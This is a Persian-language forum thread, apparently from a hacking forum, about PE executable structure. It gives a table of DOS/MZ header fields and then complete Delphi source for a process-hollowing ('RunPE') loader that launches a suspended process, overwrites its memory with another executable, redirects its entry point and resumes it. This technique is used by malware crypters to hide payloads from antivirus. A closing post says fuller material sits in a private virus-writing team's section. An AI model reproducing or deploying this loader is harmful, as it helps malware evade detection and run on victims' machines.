منضورتون از تشخیص نوع فایلهای PE چی هست؟
مقاله فارسی که نیست یکی هست کامل تو بخش خصوصی ایران ویج شما بهش دسترسی ندارین
انگلیسی زیاد هست مال گروه ARTeam اون خیلی خوبه ARTeam PE Tutorialو تو سایت codeproject یک مقاله از جناب اشکبیز دانه کار هست برای نشتن پکر میتونین از اون استفاده کنین البته سورسش به ++c هست
قلب برنامه های exe در Header آن قرار دارد طول Header برنامه های exe حد اقل 32 بایت است که اطلاعات زیادی را نشان میدهد
نگاهی به Header در exe می افکنیم
محتوی--------------طول--------------آدرس------------توضیحات
--------------------------------------------------------------------------------
0h----------------2-----------4Dh 5Ah-------------امضای برنامه exe "MZ"
2h----------------2-----------Part Page-------------طول آخرین صفحه خالی (non-full)
4h----------------2 -------Page Counter-------------طول برنامه در صفحات 512 بایتی
6h----------------2----Relocate Counter-------------تعداد عناصر در تغییر جدول
8h----------------2---------Header Size------------ طول هدر در پاراگراف
0Ah----------------2----Minimum Memory----------- حد اقل حافظه باقی مانده در پاراگراف
0Ch-----------------2---Maximum Memory-----------حد اگثر حافظه باقی مانده در پاراگراف
0Eh-----------------2------Relocation SS------------درست کردن مقدار سگمنت برای پشته (SS)
10h----------------2-------------Exe SP-------------مقدار Stack Pointer (SP)
12h----------------2---------Check Sum-------------مقدار مقابله ای
14h 2 Exe IP مقدار Instruction Pointer (IP)
16 h 2 Relocate IP درست کردن مقدار سگمنت (CS)
18h 2 Table Offset آدرس افست اولین عنصر تغییر یافته
1Ah 2 Overly تعداد همپوشانی ها
اینم یه کد به دلفی
کد:
type
TSections = array [0..0] of TImageSectionHeader;
var
Form1: TForm1;
implementation
{$R *.dfm}
{$IMAGEBASE $10000000}
function GetAlignedSize(Size: dword; Alignment: dword): dword;
begin
if ((Size mod Alignment) = 0) then
Result := Size
else
Result := ((Size div Alignment) + 1) * Alignment;
end;
function ImageSize(Image: pointer): dword;
var
Alignment: dword;
ImageNtHeaders: PImageNtHeaders;
PSections: ^TSections;
SectionLoop: dword;
begin
ImageNtHeaders := pointer(dword(dword(Image)) + dword(PImageDosHeader(Image)._lfanew));
Alignment := ImageNtHeaders.OptionalHeader.SectionAlignment;
if ((ImageNtHeaders.OptionalHeader.SizeOfHeaders mod Alignment) = 0) then
begin
Result := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
end
else
begin
Result := ((ImageNtHeaders.OptionalHeader.SizeOfHeaders div Alignment) + 1) * Alignment;
end;
PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].Misc.VirtualSize <> 0 then
begin
if ((PSections[SectionLoop].Misc.VirtualSize mod Alignment) = 0) then
begin
Result := Result + PSections[SectionLoop].Misc.VirtualSize;
end
else
begin
Result := Result + (((PSections[SectionLoop].Misc.VirtualSize div Alignment) + 1) * Alignment);
end;
end;
end;
end;
procedure CreateProcessEx(FileMemory: pointer);
var
BaseAddress, Bytes, HeaderSize, InjectSize, SectionLoop, SectionSize: dword;
Context: TContext;
FileData: pointer;
ImageNtHeaders: PImageNtHeaders;
InjectMemory: pointer;
ProcInfo: TProcessInformation;
PSections: ^TSections;
StartInfo: TStartupInfo;
begin
ImageNtHeaders := pointer(dword(dword(FileMemory)) + dword(PImageDosHeader(FileMemory)._lfanew));
InjectSize := ImageSize(FileMemory);
GetMem(InjectMemory, InjectSize);
try
FileData := InjectMemory;
HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
end;
CopyMemory(FileData, FileMemory, HeaderSize);
FileData := pointer(dword(FileData) + GetAlignedSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders, ImageNtHeaders.OptionalHeader.SectionAlignment));
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].SizeOfRawData > 0 then
begin
SectionSize := PSections[SectionLoop].SizeOfRawData;
if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
CopyMemory(FileData, pointer(dword(FileMemory) + PSections[SectionLoop].PointerToRawData), SectionSize);
FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end
else
begin
if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end;
end;
ZeroMemory(@StartInfo, SizeOf(StartupInfo));
ZeroMemory(@Context, SizeOf(TContext));
CreateProcess(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(ProcInfo.hThread, Context);
ReadProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
VirtualAllocEx(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
WriteProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(ProcInfo.hThread, Context);
ResumeThread(ProcInfo.hThread);
finally
FreeMemory(InjectMemory);
end;
end;
procedure TForm1.Button1Click(Sender: TObject);
var
MyStream: TMemoryStream;
begin
MyStream := TMemoryStream.Create;
try
MyStream.LoadFromFile('Test.exe');
CreateProcessEx(MyStream.Memory);
finally
MyStream.Free;
end;
end
خب اگه امکانش بود اینجا میزاشتن نه اونجا اون مقالات مربوط به تیم خصوصی ویروس نویسی هست نمیشه تو بخش عمومی گزاشت شمام اگه فعالیت داشته باشین دسترسیتون به اون بخش باز میشه